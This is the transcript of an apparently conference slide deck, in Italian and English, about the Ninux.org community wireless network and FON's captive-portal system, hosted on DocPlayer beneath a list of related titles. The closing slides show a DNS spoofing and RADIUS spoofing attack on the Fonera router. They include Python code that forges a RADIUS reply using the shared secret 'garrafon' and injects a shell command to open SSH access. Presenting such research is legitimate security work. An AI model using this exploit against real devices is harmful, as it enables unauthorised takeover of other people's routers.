Ninux.org Wireless Community Network

Documenti analoghi
Reti Wireless Comunitarie (ed infrastrutture di rete aperte): opportunità e prospettive

Community (free) networks. wireless network community ninux.org

Introduzione Le community network nella realtà. Reti comunitarie. Gioacchino Mazzurco. 23 maggio eigenlab.org. wiki.ninux.

shared bytes -> shared good A geek proposal for the Sharing Economy survival

L accesso alla rete wireless di UniFe e la sua integrazione con la federazione IDEM. Relatore: Michele Lugli

Presentazione Aziendale

Cosa è Tower. Sistema di autenticazione per il controllo degli accessi a reti wireless. struttura scalabile. permette la nomadicità degli utenti

Un mondo di servizi in arrivo sulle reti wireless municipali

Le problematiche tecniche del cablaggio: le soluzioni adottate e le soluzioni possibili

Installazione di NoCat

Wireless Network Esercitazioni. Alessandro Villani

Chi è Endian? Dal lancio della prima versione di prodotto, sono più di 4000 le aziende, distribuite in 50 paesi, ad aver scelto Endian.

Android Development. Course Projects. Università degli Studi di Parma

I Servizi dedicati agli utenti e alle risorse della rete GARR. Gabriella Paolini III Convegno SITAR SSBAR - Roma 23 Maggio 2013

Wireless Network Esercitazioni. Alessandro Villani

Internet. Sommario. Che cos'è? Servizi WWW Posta Elettronica Domini e DNS Evoluzioni del WEB

Reti Informatiche Edizione N

Realizzazione infrastruttura di campus per le Conferenze TERENA e GARR 2006 Consortium GARR Massimo Carboni - Fabrizio Ferri

Security aspects in Mobile IPv6

Fonera, WiFi libero per tutti!

Social Netwoking & Fon

Appunti sull'installazione della PirateBox di Massimo Bernardi

Guida alla configurazione di apparati Zyxel per l uso in abbinamento a piattaforme Wi-Fi Hotel e WiFinity

Setup di una cloud privata a Torino Un prototipo in produzione. S.Bagnasco, D.Berzano, R.Brunetti, S.Lusso

Rete wireless Appunti

Realizzazione di hotspot wireless per l Università degli Studi di Milano

Guida rapida di installazione

Open Source Tools for Network Access Control

WELCOME. Go to the link of the official University of Palermo web site Click on the box on the right side Login unico

POLICY DI ACCESSO INTERNET E CONTENT FILTER BASATE SU GRUPPI ACTIVE DIRECTORY (Firmware 2.20)

-Fig.1-

Impostazione del Monitoraggio Fronius via SMART PHONE/TABLET Utilizzo del Datamanager V 2.0

La sicurezza delle Reti: aspetti tecnici e legislativi Napoli, 16 maggio 2007 Aula Magna Facoltà di Ingegneria

Esempi Pratici di LAN

Un pinguino nel router

Unlicensed Mobile. Access. Infrastruttura e Sicurezza. Guido Bolognesi guido@kill-9.it

Reti Informatiche Edizione N

SERIE HOTSPOT. BR-HOTSPOT GATEWAY 500 Progettato per fornire l accesso a internet in modo controllato a centinaia di utenti con grande semplicità.

Ricercare l efficienza operativa facilitando il cambiamento con soluzioni enterprise avanzate

Presentazione Aziendale

Codice: Prezzo: 9.400,00

Caratteristiche tecniche HOTSPOT

VLAN+LDAP+...+XEN = Rete Dipartimentale


OpenFlow GARR virtual test-bed

User Centricity in AGCOM

Guida pratica all utilizzo di Zeroshell

Single Sign-On su USG

IP TV and Internet TV

Avremo quindi 3 utenti di dominio ai quali dovremo assegnare policy di navigazione differenti:

IP multimedia services in the NGN

Mobile Authentication

LA VIGILANZA SUGLI INTERMEDIARI ENTRATEL : AGGIORNAMENTI NORMATIVI E RISVOLTI PRATICI. Pesaro, 26/10/2011

Zeroshell autenticatore RADIUS per reti Wireless

LA SACRA BIBBIA: OSSIA L'ANTICO E IL NUOVO TESTAMENTO VERSIONE RIVEDUTA BY GIOVANNI LUZZI

Architettura di una Wireless LAN. INTOIT Networks srl Via Gaslini Monza (MI) Tel sales@intoit.

Obiettivi. Al termine del webinar sarete in grado di:

Autore: Bandiera Roberto 2016

Introduzione alla rete Internet

IBM SmartCloud Le regole per la Sicurezza nel Cloud Computing: la visione di IBM

Disciplina: Sistemi e reti Classe: 5A Informatica A.S. 2015/16 Docente: Barbara Zannol ITP: Alessandro Solazzo

Introduzione Kerberos. Orazio Battaglia

Corsi di Formazione Open Source & Scuola Provincia di Pescara gennaio 2005 aprile ~ anna.1704@ .

KNOPPIX in un ambiente Windows 2003 R2.

Provinciawifi. Metro Ethernet e Wireless ISP Virtuali Open Source. Maurizio Goretti - Davide Guerri

I CAMBIAMENTI PROTOTESTO-METATESTO, UN MODELLO CON ESEMPI BASATI SULLA TRADUZIONE DELLA BIBBIA (ITALIAN EDITION) BY BRUNO OSIMO

Reti. insieme di computer (host) interconnessi. Token evita conflitti di trasmissione Rete più o meno affidabile

ELAD FDM-S1. Manuale Installazione Componenti Per Linux

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna

Abbonati End of Revenues. subs. 2.5 b (0.5 LTE) subs. users

SERVIZIO DI ACCESSO ALLA RETE CSI-RUPAR TRAMITE VPN SSL

IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052

Internet of Things & Wireless Sensor Networks

Accesso wireless (e wired): autenticazione Layer 3 e soluzione mista

Calcolo numerico e programmazione Reti di calcolatori

Via B.M. de Mattias, Roma - Tel CAPITOLATO TECNICO

Zeroshell: access point

Internetworking V anno

PREVENTIVO LOCALE DI SPESA PER L'ANNO 2004

IN CEILING DUAL BAND ACCESS POINT/ ROUTER 1200MBPS WL-ICDBG48-050

Sommario. Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0

Senza Fili - Tecnologie Wi-Fi per atenei con servizi più agili ed efficaci

Strato di rete (parte 2) Autoconfigurazione Protocollo DHCP

Un nostro tecnico alle prese con un upgrade di circa 20 server presso un nostro cliente

NAT e PAT. Prof. Pier Luca Montessoro

Il protocollo IP A.A. 2006/2007. Alessandro Botticelli

Il protocollo IP A.A. 2005/2006. Walter Cerroni. Internet Protocol (IP) - RFC 791

community wireless networks e wireless network community ninux.org

Cisco Networking Academy Program. Nuovi Curricula CCNA ITIS E. MAJORANA CESANO MADERNO

Smart elab volume 2, anno 2013 Networking. Un Captive Portal per l'utenticazione su Reti Wifi Dedicate agli Internet Access Point Liberi

Apriti Sesamo Plus Client per Windows

Lo svolgimento della prova è a cura del prof. Giorgio Meini 1

MS WINDOWS SERVER DESIGNING A WINDOWS SERVER 2008 NETWORK INFRASTRUCTURE

QUICK INSTALLATION GUIDE BR-HOTSPOT SOCIAL WIFI

Soluzioni IT per una Logistica Senza Frontiere

Offerta Wholesale Easy IP Fibra

Configurazione delle interfacce di rete

IPSec. Internet Protocol Security. Mario Baldi. Synchrodyne Networks, Inc. mbaldi[at]synchrodyne.com. IPSec - 1 M. Baldi: nota a pagina 2

WiFiBus. La soluzione low cost di WiFi a bordo sui Bus

M2M Forum: Le esigenze del mercato aprono la strada a nuove soluzioni. Autore: Flavio Gajo Documento: Pubblico Data: 5 maggio 2011

Transcript:

Ninux.org Wireless Community Network http://www.ninux.org

Traditional Network Infrastructure: commercial wireless access OPERATOR WISP CUSTOMERS Services Infrastructure Big operators GPRS UMTS HSDPA small WISP (wi-fi): Not good business models High costs, little profit Roaming; WISP federations; WISP

Traditional Network Infrastructure: free wireless access advertisings CUSTOMERS Private founds Municipal Network Infrastructure Of course better for citizens Free access Services Mesh WiFi Public founds Little (none?) change in the network model Centralized infrastructure Centralized services

Wireless Community Network: the new way! User Node User Node User Node User Node User Node User Node User Node Users do not access the network, they are the network Users(= network nodes): User Node Volunteers Citizens Communities Business Municipality No operator Technology: Today Mesh WiFi Tomorrow?

Network Neutrality The Network is a common good Open: anyone can join Free access No third parties in the communication (operators) Multi owned New business models in a free market Gives more value to a geographical area Looks like the beginning of the Internet!

Rete come risorsa pubblica I nodi della rete sono privati Ogni membro della comunità gestisce il suo nodo L insieme dei nodi è la rete Risorsa pubblica, comunitaria: bene comune Rete libera ed aperta Come regolamentare l uso della rete? La regolamentazione è drammaticamente indietro Principi ispiratori The Wireless commons manifesto Non-Discriminatory Routing Organic Growth Mesh Networking Distributed Ownership Best Effort End-to-End Connectivity Fully Routable Addresses Fault Isolation Anonymous Access Building Use and Generating Content Responsibility

Accordi concreti adottati dai membri delle reti comunitarie Pico peering agreement (freifunk) Permette termini di utilizzo per servizi a valore aggiunto, purchè conformi a: Libero transito sui nodi Informazioni tecniche sul collegamento devono essere aperte e disponibili Nessuna garanzia sul collegamento (best effort) Wireless Commons license (guifi) Libertà di utilizzare la rete per ogni scopo a patto di non limitare la connettività e la libertà degli altri utenti. Libertà di conoscere il funzionamento della rete e dei suoi componenti. Libertà di utilizzare la rete per ogni tipo di comunicazione. Free networks agreement

Roma: Ninux; TuscoloMesh ~30 nodi ninux + ~10 nodi tuscolo Appassionati, studenti, forte collegamento con università sperimentazione tecnologie e soluzioni

Ninux: snapshot Approccio: Tutto o quasi fatto in casa (antenne, etc)

Layer 8 - People Is not easy to explain to people what is a Wireless Community People are confused about Internet People are confused about Free Software What is Wiki RSS Jabber torrent?? If you are not selling something there is something wrong with you! Most people are willing to pay but now willing to learn At least at the beginning Not everyone is like this! Cultural problem, not technological

Software Firmware open source basati su GNU/Linux e FreeBSD OpenWRT (anche usato da aziende commerciali, es. FON), pfsense, Pyramid Linux, Freifunk Firmware Quasi tutti i prodotti commericali end-user comunque partono da un firmare basato su linux D-link, Linksys, mobimesh, Sviluppati/mantenuti da comunità di Free Software Università, Linux User Groups, wireless communities (Freifunk, Ninux, )

FON Idea: ogni persona dotata di collegamento ad internet può condividerlo via wireless con altri membri della comunità Fon fornisce router wireless a basso costo a coloro che entrano a far parte della comunità FON ebay, Skype e Index Ventures e altri hanno investito 21 milioni di dollari in FON

Espansione della rete FON

Architettura della rete FON La Fonera ADSL router

Autenticazione: captive portal Captive portal: Una volta connessi all access point, qualunque pagina web si richiede, siamo reindirizzati ad una pagina nella quale dobbiamo scrivere le nostre credenziali di autenticazione Una volta autenticati, il captive portal abilita l IP e il MAC address dell utente a transitare attraverso il gateway Captive portal utilizzato da FON: ChilliSpot open source captive portal/wireless LAN access point controller. supports web based login Authentication, authorization and accounting (AAA) is handled by a radius server.

Autenticazione: captive portal

Autenticazione di un utente Radius Server 1.L utente si autentica al captive portal della FONERA introducendo le proprie credenziali 2.Viene inoltrata una richiesta radius dalla FONERA (NAS) al server radius 3.Il server risponde ed in base al tipo di risposta l utente viene autenticato oppure no

Configurazione chillispot (quando la Fonera si collega ad Internet) DNS Server Radius Server Risoluzione di radius01.fon.com Download configurazione di chillispot dal server radius siti autorizzati per navigazione senza autenticazione inviati attraverso comandi shell che la fonera esegue

Debolezze del sistema DNS è senza autenticazione Autenticazione NAS-Server Radius basata su shared secret Password uguale per tutti i NAS Il canale NAS - Server Radius non è sicuro Il NAS è nelle mani dell utente e non è tamper proof ovvero.

Shared Secret: garrafon

Attacco: DNS Spoofing Obiettivo: risolvere qualunque richiesta DNS della fonera nell IP della macchina attaccante Chi è radius01.fon.com? Fonera Io!!!! Rogue Server

Attacco: Radius Spoofing avp_list = [ 'radiusserver1 radius01.fon.com', 'radiusserver2 radius02.fon.com', 'radiussecret garrafon', 'dhcpif eth1', 'uamsecret garrafon', 'uamanydns', 'uamallowed www.martinvarsavsky.net,www.google.com,www.flickr.com,static.flickr.com,video.google.com, 216.239.51.0/24,66.249.81.0/24', 'uamallowed www.fon.com,www.paypal.com,www.paypalobjects.com,www.skype.com, 66.249.93.0/24,72.14.207.0/24,72.14.209.0/24,84.96.67.0/24,213.91.9.0/24,80.118.99. 0/24', 'uamallowed shop.fon.co.kr,secure.nuguya.com,inilite.inicis.com,fonen.custhelp.com,maps.fon.com,c20.statcounter.com', 'uamserver https://login.fon.com/cp/index.php', 'ipup "/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT; /etc/init.d/dropbear"' ]

options = for item in avp_list: options += '\x1a' #type options += chr(len(item)+8) #len options += '\x00\x00\x38\xdf' options += '\x06' #VSA attribute options += chr(len(item) + 2 ) options += item pcklen += len(item) + 8 code = '\x02' id_pack = req[1] req_auth = req[4:20] m = md5.new() auth = req_auth outdata = struct.pack ('!2cH16s',code,id_pack,pcklen,auth) pkt = outdata+options m.update(pkt+'garrafon') auth = m.digest() outdata = struct.pack ('!2cH16s',code,id_pack,pcklen,auth) resp = outdata+options

Grazie per l attenzione Domande? Ringraziamo il CameLUG e l UNICAM per l organizzazione!

2024 © DocPlayer.it Privacy Policy | Condizioni del servizio | Feed-back